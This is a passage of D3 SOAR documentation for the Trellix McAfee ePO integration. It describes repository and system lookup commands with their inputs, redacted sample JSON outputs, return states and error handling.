\\\"anonymous\\\",\\r\\n        \\\"includeAllSoftware\\\": true,\\r\\n        \\\"repositoryId\\\": \\\"McAfeeFtp\\\",\\r\\n        \\\"repositoryType\\\": 1,\\r\\n        \\\"location\\\": \\\"ftp.nai.com/CommonUpdater\\\",\\r\\n        \\\"updateExclusionList\\\": true,\\r\\n        \\\"spipeServerIP\\\": null,\\r\\n        \\\"uploadCredPassword\\\": \\\"\\\",\\r\\n        \\\"fallback\\\": false,\\r\\n        \\\"repliPasswordEncrypted\\\": true\\r\\n    }]\"",
    "disableV1DATReplication": "\"[\\r\\n \\r\\n  false\\r\\n \\r\\n ]\"",
    "location": "\"[\\r\\n \\r\\n  \\\"*****-AD/Software\\\"\\r\\n \\r\\n ]\"",
    "protocolString": "\"[\\r\\n \\r\\n  \\\"SpipeSite\\\"\\r\\n \\r\\n ]\"",
    "repositoryId": "\"[\\r\\n \\r\\n  \\\"*****-AD\\\"\\r\\n \\r\\n ]\"",
    "repositoryName": "\"[\\r\\n \\r\\n  \\\"*****-AD\\\"\\r\\n \\r\\n ]\"",
    "repositoryPort": "\"[\\r\\n \\r\\n  *****\\r\\n \\r\\n ]\"",
    "repositoryType": "\"[\\r\\n \\r\\n  2\\r\\n \\r\\n ]\"",
    "spipeServerIP": "\"[\\r\\n \\r\\n  \\\"1.1.1.1\\\"\\r\\n \\r\\n ]\"",
    "spipeServerName": "\"[\\r\\n \\r\\n  \\\"*****-AD\\\"\\r\\n \\r\\n ]\"",
    "spipeVersion": "\"[\\r\\n \\r\\n  \\\"4.5.0\\\"\\r\\n \\r\\n ]\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

SAServerDNS

disableV1DATReplication

spipeServerDNS

repositoryTypeString

useAnonCreds

downloadCredPassword

downloadCredDomain

lockType

enabled

uncUseLoggedOnUser

uncOrder

protocol

lockedBy

softwareInclusionList

uploadCredUsername

spipeVersion

SAServerNetbios

protocolString

disableFullDATReplication

replicationUNC

SAServerIP

addressType

autoID

softwareExclusionList

repositoryTypeAsString

repositoryName

spipeServerName

uploadCredDomain

repositoryPort

downloadPasswordEncrypted

httpUseAuth

downloadCredUsername

includeAllSoftware

repositoryId

repositoryType

location

updateExclusionList

spipeServerIP

uploadCredPassword

fallback

repliPasswordEncrypted

False

master

False

0

True

False

1

1

[]

4.5.0

SpipeSite

False

3

***-AD

***

***

True

False

True

***-AD

2

***-AD/Software

True

1.1.1.1

False

True

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

Find Repository failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

Find Repository failed.

Status Code: 401.

Message: Unauthorized.

Find System

Retrieves system information based on the provided name or IP address.

Input

Input Parameter

Required/Optional

Description

Example

Search Text

Optional

The IP address or name of the system to search.

***-DC

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
{
    "results": [
        {
            "EPOComputerProperties.ParentID": *****,
            "EPOComputerProperties.ComputerName": "*****",
            "EPOComputerProperties.Description": null,
            "EPOComputerProperties.ComputerDescription": "N/A",
            "EPOComputerProperties.TimeZone": "Pacific Standard Time",
            "EPOComputerProperties.DefaultLangID": "*****",
            "EPOComputerProperties.UserName": "administrator",
            "EPOComputerProperties.DomainName": "*****",
            "EPOComputerProperties.IPHostName": "*****-DC.*****.local",
            "EPOComputerProperties.IPV6": "0:0:0:0:0:FFFF:C0A0:000",
            "EPOComputerProperties.IPAddress": "1.1.1.1",
            "EPOComputerProperties.IPSubnet": "0:0:0:0:0:FFFF:C0A0:000",
            "EPOComputerProperties.IPSubnetMask": "0:0:0:0:0:FFFF:FFFF:FF00",
            "EPOComputerProperties.IPV4x": *****,
            "EPOComputerProperties.IPXAddress": "N/A",
            "EPOComputerProperties.SubnetAddress": "1.1.1.1",
            "EPOComputerProperties.SubnetMask": "2.2.2.2",
            "EPOComputerProperties.NetAddress": "*****",
            "EPOComputerProperties.OSType": "Windows Server 2019",
            "EPOComputerProperties.OSVersion": "10.0",
            "EPOComputerProperties.OSCsdVersion": "",
            "EPOComputerProperties.OSBuildNum": *****,
            "EPOComputerProperties.OSPlatform": "Server",
            "EPOComputerProperties.OSOEMID": "*****-*****-*****-*****",
            "EPOComputerProperties.CPUType": "Intel(R) Core(TM) i7-2600 CPU @ 3.40GHz",
            "EPOComputerProperties.CPUSpeed": 3392,
            "EPOComputerProperties.NumOfCPU": 8,
            "EPOComputerProperties.CPUSerialNumber": "N/A",
            "EPOComputerProperties.TotalPhysicalMemory": 17159188480,
            "EPOComputerProperties.FreeMemory": 8900734976,
            "EPOComputerProperties.FreeDiskSpace": 2005585,
            "EPOComputerProperties.TotalDiskSpace": 2059762,
            "EPOComputerProperties.IsPortable": 0,
            "EPOComputerProperties.Vdi": 0,
            "EPOComputerProperties.OSBitMode": 1,
            "EPOComputerProperties.LastAgentHandler": 1,
            "EPOComputerProperties.UserProperty1": "",
            "EPOComputerProperties.UserProperty2": "",
            "EPOComputerProperties.UserProperty3": "",
            "EPOComputerProperties.UserProperty4": "",
            "EPOComputerProperties.UserProperty5": "",
            "EPOComputerProperties.UserProperty6": "",
            "EPOComputerProperties.UserProperty7": "",
            "EPOComputerProperties.UserProperty8": "",
            "EPOComputerProperties.Free_Space_of_Drive_C": 1853153,
            "EPOComputerProperties.Total_Space_of_Drive_C": 1907177,
            "EPOLeafNode.Tags": "*****-dc, DC, DLP Deploy on Cyber-DC, Firewall For DC, Server",
            "EPOLeafNode.ExcludedTags": "",
            "EPOLeafNode.LastUpdate": "2020-03-16T08:12:02-07:00",
            "EPOLeafNode.ManagedState": 1,
            "EPOLeafNode.AgentGUID": "*****-*****-*****-*****-*****",
            "EPOLeafNode.AgentVersion": "5.6.1.157",
            "EPOBranchNode.AutoID": 7,
            "raw": "{'EPOComputerProperties.ParentID': *****, 'EPOComputerProperties.ComputerName': '*****-DC'}
            "system": "*****-DC"
        }
    ]
}
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
{
    "results": [
        {
            "EPOComputerProperties.ParentID": *****,
            "EPOComputerProperties.ComputerName": "*****",
            "EPOComputerProperties.Description": null,
            "EPOComputerProperties.ComputerDescription": "N/A",
            "EPOComputerProperties.TimeZone": "Pacific Standard Time",
            "EPOComputerProperties.DefaultLangID": "*****",
            "EPOComputerProperties.UserName": "administrator",
            "EPOComputerProperties.DomainName": "*****",
            "EPOComputerProperties.IPHostName": "*****-DC.*****.local",
            "EPOComputerProperties.IPV6": "0:0:0:0:0:FFFF:C0A0:000",
            "EPOComputerProperties.IPAddress": "1.1.1.1",
            "EPOComputerProperties.IPSubnet": "0:0:0:0:0:FFFF:C0A0:000",
            "EPOComputerProperties.IPSubnetMask": "0:0:0:0:0:FFFF:FFFF:FF00",
            "EPOComputerProperties.IPV4x": *****,
            "EPOComputerProperties.IPXAddress": "N/A",
            "EPOComputerProperties.SubnetAddress": "1.1.1.1",
            "EPOComputerProperties.SubnetMask": "2.2.2.2",
            "EPOComputerProperties.NetAddress": "*****",
            "EPOComputerProperties.OSType": "Windows Server 2019",
            "EPOComputerProperties.OSVersion": "10.0",
            "EPOComputerProperties.OSCsdVersion": "",
            "EPOComputerProperties.OSBuildNum": *****,
            "EPOComputerProperties.OSPlatform": "Server",
            "EPOComputerProperties.OSOEMID": "*****-*****-*****-*****",
            "EPOComputerProperties.CPUType": "Intel(R) Core(TM) i7-2600 CPU @ 3.40GHz",
            "EPOComputerProperties.CPUSpeed": 3392,
            "EPOComputerProperties.NumOfCPU": 8,
            "EPOComputerProperties.CPUSerialNumber": "N/A",
            "EPOComputerProperties.TotalPhysicalMemory": 17159188480,
            "EPOComputerProperties.FreeMemory": 8900734976,
            "EPOComputerProperties.FreeDiskSpace": 2005585,
            "EPOComputerProperties.TotalDiskSpace": 2059762,
            "EPOComputerProperties.IsPortable": 0,
            "EPOComputerProperties.Vdi": 0,
            "EPOComputerProperties.OSBitMode": 1,
            "EPOComputerProperties.LastAgentHandler": 1,
            "EPOComputerProperties.UserProperty1": "",
            "EPOComputerProperties.UserProperty2": "",
            "EPOComputerProperties.UserProperty3": "",
            "EPOComputerProperties.UserProperty4": "",
            "EPOComputerProperties.UserProperty5": "",
            "EPOComputerProperties.UserProperty6": "",
            "EPOComputerProperties.UserProperty7": "",
            "EPOComputerProperties.UserProperty8": "",
            "EPOComputerProperties.Free_Space_of_Drive_C": 1853153,
            "EPOComputerProperties.Total_Space_of_Drive_C": 1907177,
            "EPOLeafNode.Tags": "*****-dc, DC, DLP Deploy on Cyber-DC, Firewall For DC, Server",
            "EPOLeafNode.ExcludedTags": "",
            "EPOLeafNode.LastUpdate": "2020-03-16T08:12:02-07:00",
            "EPOLeafNode.ManagedState": 1,
            "EPOLeafNode.AgentGUID": "*****-*****-*****-*****-*****",
            "EPOLeafNode.AgentVersion": "5.6.1.157",
            "EPOBranchNode.AutoID": 7,
            "raw": "{'EPOComputerProperties.ParentID': *****, 'EPOComputerProperties.ComputerName': '*****-DC'}
            "system": "*****-DC"
        }
    ]
}
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "tagId": "\"[\\r\\n \\r\\n  43\\r\\n \\r\\n ]\"",
    "tagName": "\"[\\r\\n \\r\\n  \\\"TestTag\\\"\\r\\n \\r\\n ]\"",
    "tagNotes": "\"[\\r\\n \\r\\n  \\\"\\\"\\r\\n \\r\\n ]\"",
    "results": "\"[]"\"
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

results

{

";EPOComputerProperties.ParentID";: ***,

";EPOComputerProperties.ComputerName";: ";***-DC";,

";EPOComputerProperties.Description";: null,

";EPOComputerProperties.ComputerDescription";: ";N/A";,

";EPOComputerProperties.TimeZone";: ";Pacific Standard Time";,

";EPOComputerProperties.DefaultLangID";: ";*****";,

";EPOComputerProperties.UserName";: ";administrator";,

";EPOComputerProperties.DomainName";: ";*****";,

";EPOComputerProperties.IPHostName";: ";*****-DC.*****.local";,

";EPOComputerProperties.IPV6";: ";0:0:0:0:0:FFFF:C0A0:000";,

";EPOComputerProperties.IPAddress";: ";1.1.1.1";,

";EPOComputerProperties.IPSubnet";: ";0:0:0:0:0:FFFF:C0A0:000";,

";EPOComputerProperties.IPSubnetMask";: ";0:0:0:0:0:FFFF:FFFF:FF00";,

";EPOComputerProperties.IPV4x";: *****,

";EPOComputerProperties.IPXAddress";: ";N/A";,

";EPOComputerProperties.SubnetAddress";: ";1.1.1.1";,

";EPOComputerProperties.SubnetMask";: ";2.2.2.2";,

";EPOComputerProperties.NetAddress";: ";*****";,

";EPOComputerProperties.OSType";: ";Windows Server 2019";,

";EPOComputerProperties.OSVersion";: ";10.0";,

";EPOComputerProperties.OSCsdVersion";: ";";,

";EPOComputerProperties.OSBuildNum";: *****,

";EPOComputerProperties.OSPlatform";: ";Server";,

";EPOComputerProperties.OSOEMID";: ";*****-*****-*****-*****";,

";EPOComputerProperties.CPUType";: ";Intel(R) Core(TM) i7-2600 CPU @ 3.40GHz";,

";EPOComputerProperties.CPUSpeed";: 3392,

";EPOComputerProperties.NumOfCPU";: 8,

";EPOComputerProperties.CPUSerialNumber";: ";N/A";,

";EPOComputerProperties.TotalPhysicalMemory";: 17159188480,

";EPOComputerProperties.FreeMemory";: 8900734976,

";EPOComputerProperties.FreeDiskSpace";: 2005585,

";EPOComputerProperties.TotalDiskSpace";: 2059762,

";EPOComputerProperties.IsPortable";: 0,

";EPOComputerProperties.Vdi";: 0,

";EPOComputerProperties.OSBitMode";: 1,

";EPOComputerProperties.LastAgentHandler";: 1,

";EPOComputerProperties.UserProperty1";: ";";,

";EPOComputerProperties.UserProperty2";: ";";,

";EPOComputerProperties.UserProperty3";: ";";,

";EPOComputerProperties.UserProperty4";: ";";,

";EPOComputerProperties.UserProperty5";: ";";,

";EPOComputerProperties.UserProperty6";: ";";,

";EPOComputerProperties.UserProperty7";: ";";,

";EPOComputerProperties.UserProperty8";: ";";,

";EPOComputerProperties.Free_Space_of_Drive_C";: 1853153,

";EPOComputerProperties.Total_Space_of_Drive_C";: 1907177,

";EPOLeafNode.Tags";: ";*****-dc, DC, DLP Deploy on *****-DC, Firewall For DC, Server";,

";EPOLeafNode.ExcludedTags";: ";";,

";EPOLeafNode.LastUpdate";: ";2020-03-16T08:12:02-07:00";,

";EPOLeafNode.ManagedState";: 1,

";EPOLeafNode.AgentGUID";: ";*****-*****-*****-*****-*****";,

";EPOLeafNode.AgentVersion";: ";5.6.1.157";,

";EPOBranchNode.AutoID";: 7,

";raw";: ";{'EPOComputerProperties.ParentID': *****, 'EPOComputerProperties.ComputerName': '*****-DC', 'EPOComputerProperties.Description': None, 'EPOComputerProperties.ComputerDescription': 'N/A', 'EPOComputerProperties.TimeZone': 'Pacific Standard Time'}";,

";status";: ";success";,

";system";: ";*****-DC";

}

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

Find System failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

Find System failed.

Status Code: 401.

Message: Unauthorized.

Find System By Tag Name

Retrieves system information based on the provided tag name.

Reader Note

Tag Name is a required parameter to run this command.

  • Run the Find Tag command to obtain Tag Name. Tag Names can be found in the returned raw data at the path $[*].tagName.

Input

Input Parameter

Required/Optional

Description

Example

Tag Name

Required

The name of the tag to retrieve system information. Tag Name can be obtained using the Find Tag command.

***-DC

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "*****-DC": {
            "results": [
                {
                    "UDLP_EPOTagsView.NodeName": "*****-DC",
                    "UDLP_EPOTagsView.TagName": "*****-dc"
                }
            ]
        }
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "*****-DC": {
            "results": [
                {
                    "UDLP_EPOTagsView.NodeName": "*****-DC",
                    "UDLP_EPOTagsView.TagName": "*****-dc"
                }
            ]
        }
    }
]
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

***-DC

{

";results";: [

{

";UDLP_EPOTagsView.NodeName";: ";*****-DC";,

";UDLP_EPOTagsView.TagName";: ";*****-dc";

}

]

}

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

Find System By Tag Name failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

Find System By Tag Name failed.

Status Code: 401.

Message: Unauthorized.

Find System In Group

Retrieves system information within the specified ePO group.

Reader Note

Group ID is a required parameter to run this command.

  • Run the Find Group or Find Groups command to obtain Group ID. Group IDs can be found in the returned raw data at the path $[*].groupId.

  • If the provided group ID cannot be found, this command will return success with no results.

Input

Input Parameter

Required/Optional

Description

Example

Group ID

Required

The ID of the group to retrieve system information. Group IDs can be obtained using the Find Group or Find Groups commands.

2

Search Subgroups?

Optional

The option to include results within subgroups.

True

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
{
		"EPOComputerProperties.ParentID": 1,
		"EPOComputerProperties.ComputerName": "*****-AD",
		"EPOComputerProperties.Description": null,
		"EPOComputerProperties.ComputerDescription": null,
		"EPOComputerProperties.TimeZone": "",
		"EPOComputerProperties.DefaultLangID": "",
		"EPOComputerProperties.UserName": "",
		"EPOComputerProperties.DomainName": "",
		"EPOComputerProperties.IPHostName": "",
		"EPOComputerProperties.IPV6": null,
		"EPOComputerProperties.IPAddress": "",
		"EPOComputerProperties.IPSubnet": null,
		"EPOComputerProperties.IPSubnetMask": null,
		"EPOComputerProperties.IPV4x": null,
		"EPOComputerProperties.IPXAddress": "",
		"EPOComputerProperties.SubnetAddress": "",
		"EPOComputerProperties.SubnetMask": "",
		"EPOComputerProperties.NetAddress": "",
		"EPOComputerProperties.OSType": "",
		"EPOComputerProperties.OSVersion": "",
		"EPOComputerProperties.OSCsdVersion": "",
		"EPOComputerProperties.OSBuildNum": 0,
		"EPOComputerProperties.OSPlatform": "",
		"EPOComputerProperties.OSOEMID": "",
		"EPOComputerProperties.CPUType": "",
		"EPOComputerProperties.CPUSpeed": 0,
		"EPOComputerProperties.NumOfCPU": 0,
		"EPOComputerProperties.CPUSerialNumber": "",
		"EPOComputerProperties.TotalPhysicalMemory": 0,
		"EPOComputerProperties.FreeMemory": 0,
		"EPOComputerProperties.FreeDiskSpace": 0,
		"EPOComputerProperties.TotalDiskSpace": 0,
		"EPOComputerProperties.IsPortable": -1,
		"EPOComputerProperties.Vdi": -1,
		"EPOComputerProperties.OSBitMode": -1,
		"EPOComputerProperties.LastAgentHandler": null,
		"EPOComputerProperties.UserProperty1": null,
		"EPOComputerProperties.UserProperty2": null,
		"EPOComputerProperties.UserProperty3": null,
		"EPOComputerProperties.UserProperty4": null,
		"EPOComputerProperties.UserProperty5": null,
		"EPOComputerProperties.UserProperty6": null,
		"EPOComputerProperties.UserProperty7": null,
		"EPOComputerProperties.UserProperty8": null,
		"EPOComputerProperties.Free_Space_of_Drive_C": 0,
		"EPOComputerProperties.Total_Space_of_Drive_C": 0,
		"EPOLeafNode.Tags": "",
		"EPOLeafNode.ExcludedTags": "",
		"EPOLeafNode.LastUpdate": null,
		"EPOLeafNode.ManagedState": 0,
		"EPOLeafNode.AgentGUID": null,
		"EPOLeafNode.AgentVersion": null,
		"EPOBranchNode.AutoID": 2
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

EPOCOMPUTERPROPERTIES.PARENTID

EPOCOMPUTERPROPERTIES.COMPUTERNAME

EPOCOMPUTERPROPERTIES.DESCRIPTION

EPOCOMPUTERPROPERTIES.COMPUTERDESCRIPTION

EPOCOMPUTERPROPERTIES.TIMEZONE

EPOCOMPUTERPROPERTIES.DEFAULTLANGID

EPOCOMPUTERPROPERTIES.USERNAME

EPOCOMPUTERPROPERTIES.DOMAINNAME

EPOCOMPUTERPROPERTIES.IPHOSTNAME

EPOCOMPUTERPROPERTIES.IPV6

EPOCOMPUTERPROPERTIES.IPADDRESS

EPOCOMPUTERPROPERTIES.IPSUBNET

EPOCOMPUTERPROPERTIES.IPSUBNETMASK

EPOCOMPUTERPROPERTIES.IPV4X

EPOCOMPUTERPROPERTIES.IPXADDRESS

EPOCOMPUTERPROPERTIES.SUBNETADDRESS

EPOCOMPUTERPROPERTIES.SUBNETMASK

EPOCOMPUTERPROPERTIES.NETADDRESS

EPOCOMPUTERPROPERTIES.OSTYPE

EPOCOMPUTERPROPERTIES.OSVERSION

EPOCOMPUTERPROPERTIES.OSCSDVERSION

EPOCOMPUTERPROPERTIES.OSBUILDNUM

EPOCOMPUTERPROPERTIES.OSPLATFORM

EPOCOMPUTERPROPERTIES.OSOEMID

EPOCOMPUTERPROPERTIES.CPUTYPE

EPOCOMPUTERPROPERTIES.CPUSPEED

EPOCOMPUTERPROPERTIES.NUMOFCPU

EPOCOMPUTERPROPERTIES.CPUSERIALNUMBER

EPOCOMPUTERPROPERTIES.TOTALPHYSICALMEMORY

EPOCOMPUTERPROPERTIES.FREEMEMORY

EPOCOMPUTERPROPERTIES.FREEDISKSPACE

EPOCOMPUTERPROPERTIES.TOTALDISKSPACE

EPOCOMPUTERPROPERTIES.ISPORTABLE

EPOCOMPUTERPROPERTIES.VDI

EPOCOMPUTERPROPERTIES.OSBITMODE

EPOCOMPUTERPROPERTIES.LASTAGENTHANDLER

EPOCOMPUTERPROPERTIES.USERPROPERTY1

EPOCOMPUTERPROPERTIES.USERPROPERTY2

EPOCOMPUTERPROPERTIES.USERPROPERTY3

EPOCOMPUTERPROPERTIES.USERPROPERTY4

EPOCOMPUTERPROPERTIES.USERPROPERTY5

EPOCOMPUTERPROPERTIES.USERPROPERTY6

EPOCOMPUTERPROPERTIES.USERPROPERTY7

EPOCOMPUTERPROPERTIES.USERPROPERTY8

EPOCOMPUTERPROPERTIES.FREE_SPACE_OF_DRIVE_C

EPOCOMPUTERPROPERTIES.TOTAL_SPACE_OF_DRIVE_C

EPOLEAFNODE.TAGS

EPOLEAFNODE.EXCLUDEDTAGS

EPOLEAFNODE.LASTUPDATE

EPOLEAFNODE.MANAGEDSTATE

EPOLEAFNODE.AGENTGUID

EPOLEAFNODE.AGENTVERSION

EPOBRANCHNODE.AUTOID

1

***-AD

0

0

0

0

0

0

0

-1

-1

-1

0

0

0

2

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

Find System In Group failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

Find System In Group failed.

Status Code: 401.

Message: Unauthorized.

Find Systems By Group IDs

Retrieves system information based on the provided group IDs.

Reader Note

Group ID is a required parameter to run this command.

  • Run the Find Group or Find Groups commands to obtain Group ID. Group IDs can be found in the returned raw data at the path $[*].groupId.

Input

Input Parameter

Required/Optional

Description

Example

Group IDs

Optional

The IDs of the groups to retrieve system information. Group IDs can be obtained using the Find Group or Find Groups commands.

["5"]

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "EPOComputerProperties.ParentID": 2,
        "EPOComputerProperties.ComputerName": "*****",
        "EPOComputerProperties.Description": null,
        "EPOComputerProperties.ComputerDescription": "N/A",
        "EPOComputerProperties.TimeZone": "Pacific Standard Time",
        "EPOComputerProperties.DefaultLangID": "*****",
        "EPOComputerProperties.UserName": "Administrator",
        "EPOComputerProperties.DomainName": "WORKGROUP",
        "EPOComputerProperties.IPHostName": "*****",
        "EPOComputerProperties.IPV6": "0:0:0:0:0:FFFF:C0A0:0EB",
        "EPOComputerProperties.IPAddress": "1.2.3.4",
        "EPOComputerProperties.IPSubnet": "0:0:0:0:0:FFFF:C0A0:000",
        "EPOComputerProperties.IPSubnetMask": "0:0:0:0:0:FFFF:FFFF:FF00",
        "EPOComputerProperties.IPV4x": *****,
        "EPOComputerProperties.IPXAddress": "N/A",
        "EPOComputerProperties.SubnetAddress": "1.1.1.1",
        "EPOComputerProperties.SubnetMask": "2.2.2.2",
        "EPOComputerProperties.NetAddress": "*****",
        "EPOComputerProperties.OSType": "Windows Server 2016",
        "EPOComputerProperties.OSVersion": "10.0",
        "EPOComputerProperties.OSCsdVersion": "",
        "EPOComputerProperties.OSBuildNum": *****,
        "EPOComputerProperties.OSPlatform": "Server",
        "EPOComputerProperties.OSOEMID": "*****-*****-*****-*****",
        "EPOComputerProperties.CPUType": "Intel(R) Core(TM) i7-8700 CPU @ 3.20GHz",
        "EPOComputerProperties.CPUSpeed": 3192,
        "EPOComputerProperties.NumOfCPU": 12,
        "EPOComputerProperties.CPUSerialNumber": "N/A",
        "EPOComputerProperties.TotalPhysicalMemory": 17036529664,
        "EPOComputerProperties.FreeMemory": 3377205248,
        "EPOComputerProperties.FreeDiskSpace": 2030176,
        "EPOComputerProperties.TotalDiskSpace": 2981159,
        "EPOComputerProperties.IsPortable": 0,
        "EPOComputerProperties.Vdi": 0,
        "EPOComputerProperties.OSBitMode": 1,
        "EPOComputerProperties.LastAgentHandler": 1,
        "EPOComputerProperties.UserProperty1": "",
        "EPOComputerProperties.UserProperty2": "",
        "EPOComputerProperties.UserProperty3": "",
        "EPOComputerProperties.UserProperty4": "",
        "EPOComputerProperties.UserProperty5": "",
        "EPOComputerProperties.UserProperty6": "",
        "EPOComputerProperties.UserProperty7": "",
        "EPOComputerProperties.UserProperty8": "",
        "EPOComputerProperties.Free_Space_of_Drive_C": 476782,
        "EPOComputerProperties.Total_Space_of_Drive_C": 952335,
        "EPOLeafNode.Tags": "AR Retry, DLP_Yabin_test, Server, TestTag, Workstation, Yabin AR",
        "EPOLeafNode.ExcludedTags": "",
        "EPOLeafNode.LastUpdate": "2020-02-10T14:15:53-08:00",
        "EPOLeafNode.ManagedState": 1,
        "EPOLeafNode.AgentGUID": "*****-*****-*****-*****-*****",
        "EPOLeafNode.AgentVersion": "5.5.0.447",
        "EPOBranchNode.AutoID": 5
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "GroupID": "5",
        "SystemName": "*****",
        "MACAddress": "*****"
    },
    {
        "GroupID": "5",
        "SystemName": "*****",
        "MACAddress": "*****"
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "GroupIDs": "\"[\\r\\n\\t\\t\\t\\\"5\\\",\\r\\n\\t\\t\\t\\\"5\\\"\\r\\n\\t\\t]\"",
    "SystemNames": "\"[\\r\\n\\t\\t\\t\\\"*****\\\",\\r\\n\\t\\t\\t\\\"*****\\\"\\r\\n\\t\\t]\"",
    "MACAddresses": "\"[\\r\\n\\t\\t\\t\\\"*****\\\",\\r\\n\\t\\t\\t\\\"*****\\\"\\r\\n\\t\\t]\""
}
Return Data

Indicates one of the possible command execution states: Successful, Partially Successful, or Failed.

The Partially Successful state only occurs when a command’s input accepts an array of items (e.g. an array of IP addresses) and one or more items within the array return an error from the API request.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

GroupID

SystemName

MACAddress

5

***

***

5

***

***

Error Handling

If the Return Data is Partially Successful or Failed, an Error tab will appear in the Test Result window.

The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

Find Systems By Group IDs failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 400.

Message

The raw data or captured key error message from the integration API server about the API request failure.

